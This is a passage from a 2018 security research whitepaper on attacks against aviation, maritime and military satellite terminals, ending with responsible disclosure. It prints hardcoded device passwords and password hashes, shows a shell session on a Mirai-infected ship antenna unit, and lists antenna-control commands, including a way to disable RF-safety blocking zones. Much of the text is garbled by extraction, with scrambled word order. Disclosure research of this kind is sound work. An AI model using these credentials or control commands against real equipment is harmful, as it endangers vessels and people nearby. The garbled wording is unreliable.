45 According to the description, we should assume that the IP that is connected to this (ACU InfoServer (10.7.0.10) should belong to the Antenna Control Unit ). We could verify this is actually the case by issuing a query to the SMU’s internal DNS from the in-flight WiFi during a different flight. dig @128.65.65.98 -x 10.7.0.10 ANY ; <<>> DiG 9.8.3 -x 10.7.0.10 ANY -P1 <<>> @128.65.65.98 ; (1 server found) ;; global options: +cmd ;; Got answer: ;; - >>HEADER<<- opcode: QUERY, status: NOERROR, id: 62894 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1 ;; QUESTION SECTION: ;10.0.7.10.in -addr.arpa. IN ANY ;; ANSWER SECTION: 10.0.7.10.in- addr.arpa. 86400 IN PTR acu.aircraft.local. ;; AUTHORITY SECTION: NS addr.arpa. localhost. 0.7.10.in- IN 86400 ;; ADDITIONAL SECTION: localhost. 86400 IN A 127.0.0.1 ;; Query time: 1 msec ;; SERVER: 128.65.65.98#53(128.65.65.98) ;; WHEN: Sat May 12 18:29:58 2 018 ;; MSG SIZE rcvd: 111 The same approach was used to obtain the internal IP, in that segment, for the SMU (10.7.0.1) and the High Power Transceiver (10.7.0.20). addr.arpa. 86400 1.0.7.10.in- smu.aircraft.local. IN PTR addr.arpa. 86400 IN PTR hpt.aircraft.local. 20.0.7.10.in- From the VxWorks Shell at the MDU it was possible to ping these devices. Host Command Server This service is listening on port 2300/TCP. It relies on the function ‘hostCmd’ that supports multiple commands that can be used for different purposes: change settings, adjust radio parameters, statistics, cryptographic keys, maintenance operations, , etc . It is extensively used by other firmware functions. confi guration testing ] 43 ©2018 IOActive, Inc. [

46 We can see that the SMU (192.168.0.2) is connected to this service (as well as to the web UI) . ©2018 IOActive, Inc. [ 44 ]

47 Maritime The research that was presented in 2014 covered multiple vulnerabilities that were remotely exploitable in maritime SATCOM equipment from different vendors, such as Cobham or JRC. years , we have seen a growing interest in everything In subsequent related t o the maritime cybersecurity. The situation in this sector can be analyzed using pretty much the same metrics we use for other transportation industries, such as aviation or automotive. In this section we are presenting two fundamental scenarios: • There ar e vulnerabilities that allow to directly control an Earth Station on Vessels (ESV), including the antenna. Malware is an ongoing problem for these systems. • The Intellian Case Intellian portfolio includes multiple Satellite antennas for different services such as Global Xpress, FleetBroadband or VSAT. They also manufacture the corresponding ACUs that have been evolving over time, reaching a point where they include multiple wireless technologies such as WiFi or Bluetooth. This is the trend we see nowadays in devices that were historically isolated or supporting wired connections only. These devices are being designed with additional communication technologies that have been widely present for years in domestic devices but scarcely in 31 Intellian also provides PC and mobile apps, Aptus, the industrial sector. that allow controlling these devices. 31 http://www.intelliantech.com/News/produ ctupdates/view/14 ©2018 IOActive, Inc. [ 45 ]

48 This is the common architecture for the solution. As usual, the first step is to try our luck and find a firmware publicly available. Intellian’s main website req uires login to download firmware updates but a simple google search revealed that their Amazon S3 buckets are wide open. In fact, someone left a message warning about this problem: embedded Our target was ‘iARM_Firmware_Update -V1.10A.tgz’ file’ which contains an ramdisk with the filesystem. There are several hardcoded, in certain cases also undocumented, credentials that can be used to gain access to the affected device These credentials have been found in the following files File: '/etc/bim_user.cfg' # user for web # # # username password usergroup last password change ©2018 IOActive, Inc. [ 46 ]

49 sys_user = ["intellian" , "12345678", 0, 0] # normal user sys_user = ["masteruser", "intellian", 1, 0] # master user sys_user = ["guest", "guest", 2, 0] # guest user File: '/etc/shadow' root:$1$aB6lKKRK$VqBO1V4.mK/2z9VWDYscO1:13514:0:99999:7::: bin:*:10933:0:99999:7::: daemon:*:10933:0:99999:7::: adm:*:10933:0:99999 :7::: lp:*:10933:0:99999:7::: sync:*:10933:0:99999:7::: shutdown:*:10933:0:99999:7::: halt:*:10933:0:99999:7::: uucp:*:10933:0:99999:7::: operator:*:10933:0:99999:7::: nobody:*:10933:0:99999:7::: default::10933:0:99999:7::: sysbas:$1$G3bCE4tt$Qj63oR1J2TjYH TrIHQacJ0:13514:0:99999:7::: intellian_admin:$1$q8wWDSXA$e8u3spdqjtju5KRADToQo0:13514:0:99999:7::: File: '/etc/passwd' root:$1$1NMnvCi3$V4Im8YxDE0qlYFQbq1kkX.:0:0:root:/tmp:/bin/sh ftp:$1$8/cQQBxs$TnowI83eVlDuLPxCwatC31:1001:1001:Linux User,,,:/home/ftp:/b in/sh daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:100:sync:/bin:/bin/sync mail:x:8:8:mail:/var/spool/mail:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh -data:/var/www:/bin/sh www- data:x:33:33:www backup:x:34:34:backup:/var/backups:/bin/sh operator:x:37:37:Operator:/var:/bin/sh haldaemon:x:68:68:hald:/:/bin/sh dbus:x:81:81:dbus:/var/run/dbus:/bin/sh nobody:x:99:99:nobody:/home:/bin/sh sshd:x:103:99:Operator:/var:/bin/sh default:x:1000:1000:Default n on- root user:/home/default:/bin/sh sysbas:x:0:0:Linux User,,,:/tmp:/bin/sh intellian_admin:x:0:0:Linux User,,,:/tmp:/bin/sh File: '/etc/snmp.cfg' snmpv2 = "readwrite" snmpv2_community = "intellian" snmp_param = [ "sysLocation" , " intellian" ] snmp_param = [ "sysContact" , "intellian" ] trap_dest = "192.168.1.1" trap_port = "162" trap_param = " -v 2c - c public" AUTHENTICATION = "auth" AUTH_USER = "intellian" md5" AUTH_ENC = " AUTH_PASS = "12345678" ©2018 IOActive, Inc. [ 47 ]

50 PRIV_ENC = "" PRIV_PASS = "" context_name = "" engine_id = "" reboot_count = 0 Vulnerable CGIs the web UI contain multiple vulnerabilities, mainly unsanitized mprise The CGIs that co calls to 'system' where parameters can be controlled by the attacker. It is possible to use these CGIs to execute arbitrary commands without being previously authenticated. File: /usr/local/www/cgi -bin/setagent.cgi The security posture of the ACU firmware is certainly poor. The purpose of this research is not enumerating vulnerabilities, but it is trivial to remotely gain root access to the ACU and Telnet but also by abusing other services. not only via the web UI, FTP, SSH, ©2018 IOActive, Inc. [ 48 ]

51 Malware Onboa rd By analyzing one of the random vessels equipped with products that can be found exposed to the Internet, we discovered the ACU was infected by the Mirai botnet. In this get paper we previously described how hosts infected by the Gagfyt botnet were trying to access to an airborne modem, fortunately without success. In this case the ACU was already infected. Connected to XXXX -MASKED.nat.globalconnex.net. Escape character is '^]'. XXXX login: intellian_admin Password: # uname - a Linux BIM 2.6.39+ #4 48 PREEMPT Thu Nov 3 09:53:39 KST 2016 armv5tejl GNU/Linux # w -sh: w: not found # ps aux PID USER TIME COMMAND 1 root 0:04 init 2 root 0:01 [kthreadd] 3 root 0:00 [ksoftirqd/0] ... -ubifs_0_2] 596 root 2:28 [flush 49 ©2018 IOActive, Inc. [ ]

52 630 root 12:01 /usr/sbin/telnetd 634 root 0:00 /usr/sbin/vsftpd 643 root 59:17 /usr/local/sbin/dropbear -K 10 645 root 4:37 /sbin/pinetd 651 root 0:53 /usr/sbin/crond -l 8 652 root 0:00 /sbin/getty -L console 115200 vt100 711 root 0:00 /sbin/udhcpd -S /etc/udhcpd_running.conf 732 root 34:34 event_logger 733 root 1:11 trap_sender 747 root 169:32 /bin/acu_server 813 root 87:27 snmpd - f - c /etc/snmpd.conf 844 root 20:19 /bin/wifi_manager 845 root 65:46 /bin/sg_daemon 846 root 213:36 /bin/modem_mon 847 root 2:52 /bin/imon -l 8 852 root 0:53 /usr/sbin/crond 854 root 0:00 stunnel /et c/stunnel.conf 862 root 14:30 /bin/lighttpd -D - m /lib - f /etc/lighttpd.conf 6106 root 0:08 /usr/local/sbin/dropbear -K 10 6722 root 0:04 [kworker/0:0] 6852 ftp 0:06 {wul0a7f2w0db200} gubsprpsodbs 6854 ftp 0:48 {wu l0a7f2w0db200} gubsprpsodbs 11060 root 0:00 [kworker/0:1] 11246 root 0:06 /usr/local/sbin/dropbear -K 10 11837 root 8:14 /bin/cgi_uif_storage_updater -K 10 12285 root 0:11 /usr/local/sbin/dropbear -K 10 13247 root 0:07 /usr/loc al/sbin/dropbear -K 10 13342 root 0:07 /usr/local/sbin/dropbear 13343 root 0:06 /usr/local/sbin/dropbear -K 10 One of the most interesting parts of this firmware is the binary ‘acu_server’, which implements several protocols to interface with different SATCOM modems. Controlling the Antenna Once the ACU ha , we were interested in having full control over the d been compromised antenna. Intellian has developed a protocol for this purpose apparently known as ‘UIF’. We can reverse engineer it from different sources: • Firmware (acu_server,vtysh, acu_tool, uif_tool...) • APTUS apps This is a simple text -based protocol that follows this patter n: {COMMAND PARAMETERS}CHECKSUM These are the supported commands: public enum UIF { UIF_OP_RESTART("OR"), UIF_OP_SETUP("OS"), UIF_SELECT_TR_SAT("LT"), UIF_SET_TR_SAT("ST"), UIF_REQUEST_SIGNAL_LEVEL("QV"), UIF_REQUEST_ANT_STATUS("QS"), UIF_REQUEST_ANT_INFO("QI"), UIF_REQUEST_ANT_INFO_ALL("QA"), UIF_REQUEST_ANT_POS("QP"), UIF_REQUEST_DIAGNOSIS("QD"), 50 ©2018 IOActive, Inc. [ ]

53 UIF_REQUEST_PATTERN("QT"), UIF_REQUEST_VOLTAGE("QG"), UIF_SET_DEFAULT("SD"), UIF_SET_DEFAULT_WITHOUT_OFFSET("Sd"), UIF_SET_GPS("SG"), UIF_SET_SKEW_ANGLE("SK"), UIF_SET_SKEW_OFFSET("KO"), UIF_SET_LOCAL_FREQUENCY("SL"), UIF_SET_PAIR_SAT("SP"), UIF_EDIT_SAT_INFO("EI"), UIF_EDIT_SAT_INFO_SPARE("Eu"), UIF_EDIT_TR_INFO("ET"), UIF_EDIT_TR_INFO_SPARE("EU"), UIF_SET_ANT_PARAMETER("SA"), UIF_SET_CONTROL_PARAMETER("SC"), UIF_SET_ANTENNA_PARAMETER("Sa"), UIF_SET_ANT_FLAG("FG"), UIF_SET_POWER("SW"), UIF_SET_DISEQC("SQ"), UIF_CALIBRATION_SKEW("CK"), UIF_GOTO_POSITION("GO"), UIF_MOVE_STEP("MO"), UIF_MOVE_SKEW("MS"), UIF_FIND_SYMBOL("FS"), UIF_FIND_OFFSET("FO"), UIF_FIND_NOISE_LEVEL("FN"), UIF_COMMAND_ACK("AC"), UIF_SEND_NUM_SAT("NN"), UIF_SEND_SELECT_TR_SAT("NS"), UIF_SEND_SIGNAL_LEVEL("NV"), UIF_SEND_AGC_LOCK("Nv"), UIF_SEND_ANT_STATUS("NA"), UIF_SEND_ANT_INFORMATION("Ni"), UIF_SEND_SW_VERSION("NW"), UIF_SEND_PRODUCT_NAME("Nn"), UIF_SEND_GPS("NG"), UIF_SEND_LOCAL_FREQUENCY("NL"), UIF_SEND_PAIR_SAT("NP"), UIF_SEND_SAT_INFO("NI"), UIF_SEND_SAT_INFO_SPARE("Nu"), UIF_SEND_TR_INFO("NT"), UIF_SEND_TR_INFO_SPARE("NU"), UIF_SEND_ANT_PARAMETER("NR"), UIF_SEND_CONTROL_PARAMETER("NC"), UIF_SEND_ANTENNA_PARAMETER("Np"), UIF_SEND_ANT_FLAG("NF"), UIF_SEND_DIAGNOSIS("ND"), UIF_SEND_POWER("Nw"), UIF_SEND_VOLTAGE("VL"), UIF_SEND_DISEQC("NQ"), UIF_SEND_NID("ID"), UIF_SEND_PAT TERN("PT"), UIF_SEND_ANT_POS("AP"), UIF_SEND_CUR_SKEW_ANGLE("TK"), UIF_SEND_SKEW_ANGLES("NK"), UIF_SEND_AXIS_RANGE("AX"), UIF_SEND_SYMBOL("SS"), UIF_SEND_OFFSET("SO"), UIF_SEND_NOISE_LEVEL("SN"), UIF_SEND_ETC("TC"), UIF_SEND_MESSAGE("ME"), UIF_SET_TRIPLE_SAT("TR"), UIF_GOTO_BOOTLOADER("GB"), UIF_SET_SERIAL_NO("TS"), UIF_SEND_SERIAL_NO("EN"), UIF_SET_EL_OFFSET("TL"), UIF_SEND_EL_OFFSET("DL"), UIF_SET_SKEW_OFFSET_TABLE("KT"), UIF_SET_PRODUCT_ NAME("Sn"), UIF_SET_MIM("SM"), UIF_SET_HEADING("SH"), ©2018 IOActive, Inc. [ 51 ]

54 UIF_STAB_JOB_COMMAND("BJ"), UIF_STAB_SET_STATUS("BS"), UIF_STAB_SET_PARAMETER("BP"), UIF_STAB_SET_TARGET_OFFSET("BT"), UIF_PCU_JOB_COMMAND("CJ"), UIF_PCU_SET_PARAMETER("CP"), UIF_GYRO_REQUEST("GR"), UIF_GYRO_SEND("GN"), UIF_GYRO_SET("GS"), UIF_SET_BAND_SW("LP"), UIF_SEND_BAND_SW("lp"), UIF_SET_BAND_SW_OFFSET("BO"), UIF_SEND_BAND_SW_OFFSET("bo"), UIF_DISEQC_12("Di" ), UIF_MODEM_REQUEST("MR"), UIF_MODEM_PROTOCOL("MP"), UIF_SEND_MODEM_TX_ENABLE("TX"), UIF_BLOCK_ZONE("BK"), UIF_GPS_EX("Vg"), UIF_MULTIPLE_LOCAL_FREQUENCY("Vl"), UIF_TRACKING_PARAMETER("Vt"), UIF_NBD_INFO("Vn"), UIF_SYSTEM_TYPE("Vs"), UIF_SAT_DVB_INFO("Vd"), UIF_BACKUP_RESTORE("BR"), UIF_LOAD_LIBRARY("LL"), UIF_PC_CONNECT_MONITOR("PM"), UIF_DIAGNOSIS_RESULT("DD"), UIF_ACU_SETTINGS("AS"), UIF_POL_CHANGE("PC"), UIF_BOOT_STATUS("BD"), UIF_SAT_DVB_INFO_C("Cd"), UIF_NBD_INFO_C("Cn"), UIF_SAT_INFO_C_KU("CI"), UIF_TRACKING_PARAMETER_C("Ct"), UIF_TRACKING_PARAMETER_C_KU("CT"), UIF_TRACKING_PARAMETER_SCAN_OFFSET("CS"), UIF_GPS_DATE("GD"), UIF_USB_COMMAND("US"), UIF_SEND_OPEATION("LO"), UIF_SEND_HISTORY("MH"), UIF_SEND_MESSAGE_LOG("ML"), UIF_SAT_DVB_INFO_LONG("vD"), UIF_SAT_DVB_INFO_LONG_C("cD"), UIF_INTERNAL_PROTOCOL("YS"), UIF_SEND_SESSION_ID("IA"), UIF_SEND_SW_UNICODE("SU"), UIF_SEND_SPECTRUM_GRAPH("NB"), UIF_SYSTEM_INFORMATION("SI"); Using this protocol, it is possible to control any parameter in the targeted antenna, Blocking zones are areas where the signal is blocked between the antenna and the he ship’s superstructure . These are zones that can be configured in satellite because of t the antenna using the specific command ‘BK’ (BLOCK_ZONE) to prevent RF exposure. An attacker can bypass this safety protection by either disabling the selected Blocking Zones or directly controlling the Azimuth and Elevation of the antenna in ‘Setup Mode’ . Certain antennas may ha ve additional physical controls to prevent harmful antenna addition to software controls. pointing, in ©2018 IOActive, Inc. [ 52 ]

55 ©2018 IOActive, Inc. [ 53 ]

56 Military 32 In 2014, in the paper “A Wake SATCOM Security” -Up Call For , we described a potential attack scenario where enemy forces could leverage vulnerable SATCOM equipment to pinpoint military units, as these terminals usually need an attached GPS device. IOActive discovered several military SATCOM term inals exposed to the Internet, thus leaving them open to attacks. These systems can be accessed through multiple ports that expose both common and proprietary services. It was possible to discover where these terminals were deployed as the GPS position was available. These devices were deployed in active conflict zones. Due to the sensitive nature of this information IOActive will not disclose further details about these systems. 32 https://ioactive.com/pdfs/IOActive_SATCOM_Security_WhitePaper.pdf ©2018 IOActive, Inc. [ 54 ]

57 -Physical Attacks Cyber We have already described the approach used to turn a compromised SATCOM terminal into an intentional radiator, which involves two fundamental actions: • Controlling the antenna positioning Controlling the ability to transmit. • This part elaborates the theory and regulations behind HIRF attacks and presents a numeric model to assess the actual impact on both Aviation and Maritime industries. Going Beyond Logic Attacks, Physical Radio waves and microwaves emitted by transmitting antennas are one form of RF). This is electromagnetic energy, which is collectively describe d as Radio Frequency ( achieved by electrically oscillating free electrons back and forth within a conducting . material If we think of non -ionizing radiation as the propagation of energy through space, then we the interface between the compromised device have that a SATCOM antenna serves as . So, from a low -level and the propagation medium, which in this case is the free space , the antenna is basically allowing us to generate controlled waves of electric perspective rd a specific location. and magnetic energy directed towa What happens once this electromagnetic energy reaches their target? The electric field component will exert a force on charged particles that may push away or attract electrons. From these interactions there is a derived thermal e ffect , which for non -ionizing radiation, is the only adverse biological damage that has been demonstrated. It may help to get the idea behind these attacks if we mention that this is basically the same physical principle microwave ovens use to cook food or heat liquids. For the purpose of safety analysis, the 33 FCC standard defines two types of exposure: 33 https://transition.fcc.gov/Bureaus/Engineering_Technology/Documents/bulletins/oet56/oet56e4.pdf 55 ©2018 IOActive, Inc. [ ]

58 • Controlled environment s usually occurring at workplaces or in restricted areas. Persons These are situation must be aware of the potential for exposure and be able to exercise control over their exposure • Uncontrolled environment These are situations where persons may not be aware of their exposure. They also apply in situations where persons are aware of their exposure but cannot do anything to limit it. The uncontrolled environment would be the attacker’s scenario. The following table shows the time -averaging limits. The risk is not limited to biological tissues but also for electrical and electronics systems mainly because of coupling. Under this context it seems obvious that, nowadays, any system that is designed to radiate RF energy needs to be analyzed to verify that the RF exposure is within safe limits. However, unsafe levels can still be reached due to several factors such as high transmitter power, high antenna gain, close proximity to a transmitting antenna, or any combination thereof. 56 ©2018 IOActive, Inc. [ ]

59 We describe as High Intensity Radiat ed Fields those that can produce, within the kHz to strength sufficient to frequency domain from 10 40 GHz , an electromagnetic field adversely affect a living organism or cause a malfunction to an electrical or electronic system. Due to the nature of the medium where maritime and aviation industries and locations perform their activities, the exposure to this kind of fields is higher for aircraft. As a result the protection standards against the adverse effects of HIRF are much more developed in the aviation industry. High Intensity Radiat ed Fields in the Aviation Industry It is important to note that the Electromagnetic Effect Harmonization Working Group was created to harmonize HIRF regulation for Europe and the United States, so the same regulatory levels are applied in multiple countries. The aviation industry has been actively researching the risks of HIRF since at least the 34 early 1980s. Standards quickly followed this initial empirical research with a Special 35 Condition for HRIF that was put into effect in 1986. Detailed testing procedures for HIRF mental Conditions and Test -160C, “Environ were published in the late 1980s in DO Procedures for Airborne Equipment”. The EU -US harmonized HRIF standards were put in 36 place in the early 1990s and regularly refined with the la test significant update in 2006. The industry has done a good job of putting strong de sign and testing standards in place that would protect critical flight systems from HIRF attacks using airborne SATCOM equipment. The industry should be commended for identifying an emerging threat in HIRF and responding to put policy and technical control s in place to mitigate the risks. The electromagnetic HIRF environment results from the transmission of electromagnetic energy from radar, radio, television, and other ground -based, shipborne, or airborne RF . transmitters. The three defined environments ar e covered in the following table 34 http://www.tc.faa.gov/its/worldpac/techrpt/ct83 -49.pdf 35 -895/high- https://www.federalregister.gov/documents/2006/02/01/06 intensity- radiated- fields -hirf -protection -for - -and- electronic aircraft -electrical -systems 36 ibid ] 57 ©2018 IOActive, Inc. [

60 These HIRF limits apply to all equipment onboard an aircraft and not only to the radio systems such as the Instrument Landing System, but also to the flight management, engine control, fuel management, electronic display, instrumentation systems, auto -pilot, etc. However, not all of them are equally certified, according their critically they need to 37 comply with the following table . 37 advisory_circulars/index.cfm/go/document.information/documentID/1024 https://www.faa.gov/regulations_policies/ 526 ©2018 IOActive, Inc. [ 58 ]

61 The certification requirement for aircraft before 1986 has been in the order of 20 V/m a nd after 1986 the requirement was raised to 190 V/m and 150 V/m for the Ku and Ka bands 38 respectively . Nevertheless, it is assumed that modern aircraft s are protected against HIRF higher than those for which they have been certified. These regulatory level s are derived from specific conditions where certain assumptions were made; among them we can find the followin g: • The noncumulative field strength was calculated; however, simultaneous 40 39 illumination by more than one antenna was not considered. assumption has been consistent through the different amendments. Based on this, This we considered there was an important factor to take into account: the scale of the attack. In the scenario we have been describing in this paper le , it was possible to have multip compromised antennas illuminating an aircraft at the same time, so in our assessment of the risks we also considered the aggregated electric field strength. 38 -160 https://en.wikipedia.org/wiki/DO 39 https://rosap.ntl.bts.gov/view/dot/15645/Print 40 https://www.federalregister.gov/documents/2006/02/01/06 -for - intensity- radiated -fields -hirf -protection -895/high- -and- electronic -systems aircraft -electrical 59 ©2018 IOActive, Inc. [ ]

62 Due to its relevance for this research , we reproduce the following text extracted from a 41 real accident report published by the Transportation Safety Board of Canada . It describes how HIRF can disrupt avionics. Disruptions to Avionics Digital devices incorporate frequency sources, or clocks, for the timing and control of internal digital functi ons. Aircraft avionics use digital devices that are specifically qualified for aircraft use. These digital devices tend to have slower processor and data bus clock speeds than modern consumer electronics. For aircraft flying today, the avionics processor a nd data bus clock speeds range from 2 MHz to approximately 300 MHz. The bandpass region for a digital device extends from the clock speed to times the clock speed. approximately 10 be HIRF interference that appears within the bandpass of a digital device may interpreted as a legitimate control signal, driving the device into unpredictable states. HIRF interference that is not within the bandpass of the digital device may be rectified by components of the digital circuit, such as diodes. The interference wil l then appear offset on the control signal, triggering uncommanded state changes or locking as a DC the device into one state. Some failure modes may not be readily apparent to the operator. It is more likely, however, that error detection circuitry will detect the corrupted control signal(s), in which case error messages will be generated and system degradation will occur in a relativ ely controlled manner. In the RF spectrum, digital circuits may be disrupted by potential differences ranging V. Analog circuits can be sensitive to induced gradients as small as from 0.4 to 1.2 50 mV , although this latter value is largely dependent on the gain characteristics of the affected circuitry. However, monitoring circuits on analog systems and error detection algorithms in digital systems are normally able to detect HIRF interference before a 41 -reports/aviation/1998/a98h0003/02sti/sti_toc.asp http ://www.tsb.gc.ca/eng/rapports 60 ©2018 IOActive, Inc. [ ]

63 major upset occurs. Power supply disconnects are the most common response to HIRF interference. It is also theoretically possible to generate specific third -order intermodulation products that might create interferences in some of the RF bands used aboard . Analysis of Radiation Hazards All those companies that want to receive a license to operate either Earth Stations Aboard 42 Aircraft (ESAA) or Earth Stations On Vessels (ESV) need submit a RF hazard analysis determining via calculation, simulation, or field measurement whether the devices in dispute comply with the established regulatory limits. 43 The FCC provides the equations and methodology to perform this evaluation. It is highly o consult the referenced FCC bulletin #65 before continuing, as this is the recommended t approach that has been used to implement the model. Usually vendors limit this analysis to the near -field once they have demonstrated they do not exceed the maximum values allowed. The antenna radiation field is divided into three distinct regions, where the characteristics of the radiated wave are different. The picture below contains a summary of some of the most significant equations that have been used in the model. 42 -vol2/pdf/CFR https://www.gpo.gov/fdsys/pkg/CFR -2010 -title47 -2010 -title47 -vol2 -sec25 -222.pdf 43 https://transition.fcc.gov/Bureaus/Engineering_Technology/Documents/bulletins/oet65/oet65.pdf ©2018 IOActive, Inc. [ 61 ]

64 where pfd : Power flux density P : Power fed to the antenna G : Antenna gain in the direction of interest relative to an isotropic radiator d : Distance to the point of interest During the study of antennas, a useful abstraction exercise is to consider them as isotropic radiators, which means they are equally radiating in all directions, following a spherical pattern. However, the antennas considered in this study are directional antennas . This means that for specific angles a gain radiation pattern to the ideal of (G) can be measured, where mo re power output is radiated compared As we can see in the picture, the main lobe is where the strength of the radiated an isotropic radiator. power is higher. SATCOM We are describing cyber-p hysical attacks, using compromised antennas, assuming t he main lobe is illuminating the target at a distance ‘d’, which is located in the Far -Field. In this region, the antenna radiation pattern is fully formed, and does not depend on the distance any more, but on t he antenna’s azimuth and elevation angles, which as we have seen can be controlled. Those scenarios where near -field models should be applied should be evaluated on a case -by -case basis. ] 62 ©2018 IOActive, Inc. [

65 Antenna Models For assessing the feasibility of cyber -physical attacks, we are covering two antennas, are equivalent in terms of attack vectors to those we have already analyzed from which the security perspective. Intellian GX60 – Maritime Figure 8. http://www.intelliantech.com/Satcom/gx/ gx60 The following tables show both the Electric Field Strength and the Power Density starting at the Far -Field range. 63 ©2018 IOActive, Inc. [ ]

66 In the Far -Field the antenna exceeds the Maximum Permissible Exposure MPE for 2 Uncontrolled exposure (1 mW/cm ). Thus, potentially creating a safety risk. Taking into account this we can define two attack scenarios. It is assumed the antenna has been compromised using the aforementioned techniques. Cargo Vessel rs so the bridge Assuming a regular beam of 60 meters, the Far -Field starts at 25,35 mete can be affected by uncontrolled RF exposure. 64 ©2018 IOActive, Inc. [ ]

67 In this scenario it is also important to note that final power density values can be incremented due to the vessel design factors, which may cause resonance during the propagation. ps Cruise shi The structure of these ships makes them prone to this kind of situations as we can see in 44 the picture . As we have previously described, a crucial factor is that attackers can disable blocking zones. 44 -1c60 https://pro2 -bar-s3-cdn -cf4.myportfolio.com/ebb2d4b275615064f8500d0507f0801c/5903bcbb -4baf-b6cc- 5255a85a71d6_rw_1200.jpg?h=eee7f61b319b547ebde970c60d9fcdeb 65 ©2018 IOActive, Inc. [ ]

68 of the attack. As there may be more Once again, we need to take into account the scale than one antenna in the same ship that can be compromised. Kustream 1500 - Aviation This is a phased array antenna with a higher transmission power than the Kustream 1000, originally used by GEE. 66 ©2018 IOActive, Inc. [ ]

69 In the Far -Field the antenna exceeds the MPE regulatory limits for uncontrolled exposure. Assuming the ARINC 791 equipment has been compromised using the aforementioned techniques we can describe the following two scenarios: Ground minimum distances between airplanes and gates, Far-Field starts at 12 meters. With The it is unlikely this might create any kind of safety risk. We can see a clear picture of this situation using a satellite view of the Atlanta dentify Southwest airplanes equipped with a International Airport, where it is possible to i SATCOM antenna. 67 ©2018 IOActive, Inc. [ ]

70 Assuming the antenna is transmitting at maximum EIRP, at that distance, even without taking account any further attenuation, the power density would be approximately 2 0.1 mW/cm , well behind the MPE for uncontrolled exposure. In terms of the aggregated Electric Field Strength, in order to exceed the regulatory level 190 V/m we would need more than 10 aircraft radiating at the minimum distance that needs to be maintained between aircraft. This sit uation is impractical in modern airports. In-Flight -flight aircraft, and also the ft between in Assuming the vertical minimum distance of 1000 of transient nature of the illumination in this scenario, we would require hundreds airplanes illuminating the ta rget to exceed the regulatory levels, which is not feasible. a complex area, with multiple scenarios and conditions The analysis of HIRF hazards is that can modify the outcome. Nevertheless, IOActive would like to clarify that based on the feedback provide d by the aviation industry, through A -ISAC, the maturity of aviation technologies, compensating controls and our own research we consider that, at this point, aviation industry. there is no safety risk for the ] 68 ©2018 IOActive, Inc. [

71 Responsible Disclosure IOActive followed th e responsible disclosure standards, trying to coordinate with all the involved authorities, organizations, and companies affected. Since November 2017 we -CERT and some of have reported these issues to EASA, EU -CERT, US -CERT , and ICS nfortunately , we did not receive the expected collaboration in the affected vendors. U certain cases. This has been one of the most complex scenarios for a coordinated disclosure , so we would like to thank Peter Lemme, chairman of ARINC 791, for his commitment to 46 45 independently ev aluate for providing their collaboration -ISAC these issues as well A and valuable feedback. We can confirm that the affected airlines are no longer exposing their fleets to the Internet. We do not have any further information about the remaining issues described in this paper. 45 http://www.satcom.guru/2018/02/malfunction -in-aero- kuka -band -satcom.html 46 https://www.a -isac.com/ ] 69 ©2018 IOActive, Inc. [

72 Conclusion “A Wake -Up Call For SATCOM Security” was published at BlackHat in 2014. This research got attention from multiple actors across different sectors and media outlets, thus breaking the intrinsic barriers that delimit our security industry. We consider this outcome a tremendous success derived from a niche research initiative. As a result, important companies around the SATCOM industry became aware of the potential threats derived from SATCOM -based attacks and the need to secure their assets. At IOActive we are proud to be helping some of them to take the proper actions along that journey. In the previous research , we theorized potential scenarios attackers could exploit once SATCOM terminals have been compromised in three main sectors: Aviation, Maritime , and Military. This current research maintained the focus on these sectors as the main targets for potential attacks, because the circumstances have not substantially changed. Demonstrating that some of the theoretical scenarios presented in 2014 were, in f act, possible is the motivation that has kept this research alive. The technologies that have been covered in this paper have a significant impact on society, for good. It is everyone’s responsibility to keep it in that way, as the alternative scenario, w are possible, is certainly not an option. here safety risks About IOActive IOActive is a comprehensive, high -end information security services firm with a long and established pedigree in delivering elite security services to its customers. Our world -renowned consulting and research teams deliver a portfolio of specialist securit y services ranging from penetration testing and application code assessment through to semiconductor reverse engineering. Globa l 500 companies across every industry continue to trust IOActive with their most critical and sensitive security issues. Founde d in 1998, IOActive is headquartered in Seattle, USA, with global operations through the Americas, EMEA and Asia Pac regions. Visi t www.ioactive.com for more information. Read the IOActive Labs Research Blog: http://blog.ioactive.com/ . Follow IOActive on . Twitter: http://twitter.com/ioactive 70 ©2018 IOActive, Inc. [ ]

Related documents

JO 7400.11C   Airspace Designations and Reporting Points

JO 7400.11C Airspace Designations and Reporting Points

U.S. DEPARTMENT OF TRANSPORTATION ORDER FEDERAL AVIATION ADMINISTRATION 7400.11C JO Air Traffic Organization Policy August 13, 2018 SUBJ: Airspace Designations and Reporting Points . This O rder, publ...

More info »
Programming Guide for ZPL II, ZBI 2, Set Get Do, Mirror, WML (en)

Programming Guide for ZPL II, ZBI 2, Set Get Do, Mirror, WML (en)

Programming Guide ZPL II ZBI 2 Set-Get-Do Mirror WML

More info »
CityNT2019TentRoll 1

CityNT2019TentRoll 1

STATE OF NEW YORK 2 0 1 9 T E N T A T I V E A S S E S S M E N T R O L L PAGE 1 VALUATION DATE-JUL 01, 2018 COUNTY - Niagara T A X A B L E SECTION OF THE ROLL - 1 CITY - North Tonawanda TAX MAP NUMBER ...

More info »
CRPT 116hrpt9 u2

CRPT 116hrpt9 u2

U:\2019CONF\HJRes31Front.xml APPRO. SEN. [COMMITTEE PRINT] REPORT { } CONGRESS 116TH 1st HOUSE OF REPRESENTATIVES Session 116- FURTHER APPROPRIATIONS FOR MAKING CONTINUING OF HOMELAND SECURITY FOR THE...

More info »
RIE Tenant List By Docket Number

RIE Tenant List By Docket Number

SCRIE TENANTS LIST ~ By Docket Number ~ Borough of Bronx SCRIE in the last year; it includes tenants that have a lease expiration date equal or who have received • This report displays information on ...

More info »
CalCOFI Atlas 33

CalCOFI Atlas 33

THE EARLY STAGES IN OF THE FISHES CALIFORNIA CURRENT REGION CALIFORNIA FISHERIES COOPERATIVE OCEANIC INVESTIGATIONS ATLAS NO. 33 BY THE SPONSORED STATES OF COMMERCE DEPARTMENT UNITED OCEANIC AND ATMOS...

More info »
An Introduction to Computer Networks

An Introduction to Computer Networks

An Introduction to Computer Networks Release 1.9.18 Peter L Dordal Mar 31, 2019

More info »
MPI: A Message Passing Interface Standard

MPI: A Message Passing Interface Standard

MPI : A Message-Passing Interface Standard Version 3.0 Message Passing Interface Forum September 21, 2012

More info »
OperatorHoursReport

OperatorHoursReport

